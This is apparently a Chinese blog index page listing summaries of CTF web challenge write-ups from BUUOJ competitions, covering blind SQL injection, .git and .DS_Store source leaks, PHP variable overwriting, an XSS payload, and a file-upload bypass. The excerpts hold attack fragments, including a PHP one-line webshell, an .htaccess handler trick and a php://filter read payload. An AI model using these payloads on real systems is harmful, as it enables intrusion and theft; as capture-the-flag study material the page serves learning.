上一页 1 ··· 6 7 8 9 10 11 12 13 14 15 下一页
2020年5月13日
jactf-sql
摘要: 知识点 布尔盲注 过滤了 union 无法使用联合查询 or information_schema表不能用 sub substr()函数不能用 concat 不能使用报错注入里的concat('~',select database()) 关于information_schema表被禁后怎么注入可以参 阅读全文
posted @ 2020-05-13 20:11 山野村夫z1 阅读(155) 评论(0) 推荐(0) 编辑
[CISCN2019 总决赛 Day2 Web1]Easyweb
摘要: 爆表脚本 爆表脚本 # -*- coding: utf-8 -*- #version:python3.8 import requests import time '''url = "http://f69281bc-5b5b-4122-9272-40339993c89e.node3.buuoj.cn/ 阅读全文
posted @ 2020-05-13 20:06 山野村夫z1 阅读(296) 评论(0) 推荐(0) 编辑
[BJDCTF2020]Mark loves cat
摘要: 知识点 .git源码泄露 $$导致变量覆盖 扫描到有.git源码泄露,将其下载下来 <?php include 'flag.php'; $yds = "dog"; $is = "cat"; $handsome = 'yds'; foreach($_POST as $x => $y){ $$x = $ 阅读全文
posted @ 2020-05-13 20:02 山野村夫z1 阅读(299) 评论(0) 推荐(0) 编辑
[BJDCTF 2nd]假猪套天下第一
摘要: 知识点 .DS_Store泄露,暴露出网站结构 随便输入用户名和密码,登录 使用dirsearch工具扫描网站,发现.DS_Store文件泄露 使用工具下载.DS_Store py -2 ds_store_exp.py http://node3.buuoj.cn:26879/.DS_Store 看到 阅读全文
posted @ 2020-05-13 19:57 山野村夫z1 阅读(179) 评论(0) 推荐(0) 编辑
[BJDCTF 2nd]xss之光
摘要: .git文件泄露 上GitHack获取源码 <?php $a = $_GET['yds_is_so_beautiful']; echo unserialize($a); 原生类构造 payload <?php $a = serialize(new Exception("<script>window. 阅读全文
posted @ 2020-05-13 19:50 山野村夫z1 阅读(342) 评论(0) 推荐(0) 编辑
[GXYCTF2019]BabyUpload
摘要: png文件不许上传,尝试上传jpg 修改后缀名为.htaccess,文件内容为 SetHandler application/x-httpd-php 上传一句话木马 <?php eval($_POST[cmd]);?> 失败,换一种方式 <script language='php'>eval($_P 阅读全文
posted @ 2020-05-13 19:14 山野村夫z1 阅读(235) 评论(0) 推荐(0) 编辑
[GWCTF 2019]枯燥的抽奖
摘要: 查看源码,发现check.php 访问check.php得到源码 <?php #这不是抽奖程序的源代码!不许看! header("Content-Type: text/html;charset=utf-8"); session_start(); if(!isset($_SESSION['seed'] 阅读全文
posted @ 2020-05-13 18:57 山野村夫z1 阅读(506) 评论(0) 推荐(0) 编辑
[网鼎杯 2018]Comment
摘要: 主页面是一个留言板 要想发帖得先登录 爆破一下密码,为zhangwei666,登录即可发帖 扫描到后台有.git文件泄露,但是下载下来的源码不齐全 <?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ 阅读全文
posted @ 2020-05-13 16:56 山野村夫z1 阅读(1420) 评论(0) 推荐(2) 编辑
[ACTF2020 新生赛]BackupFile
摘要: 知识点 bak源码泄露 php弱类型 题目提示源码泄露dirsearch扫一下后台 #windows下装了python2和python3的情况 py -3 dirsearch.py -u url -e * 得到index.php.bak,删去bak,打开index.php <?php include 阅读全文
posted @ 2020-05-13 11:03 山野村夫z1 阅读(411) 评论(0) 推荐(0) 编辑
[RoarCTF 2019]Easy Java
摘要: 知识点 web.xml泄露 filter伪协议读取 打开题目,如图所示 尝试点击help发现 发现filename=help.docx有可能可以进行文件读取,尝试 php://filter/read=convert.base64-encode/resource=help.docx 无果,查看wp,知 阅读全文
posted @ 2020-05-13 10:20 山野村夫z1 阅读(242) 评论(0) 推荐(0) 编辑
上一页 1 ··· 6 7 8 9 10 11 12 13 14 15 下一页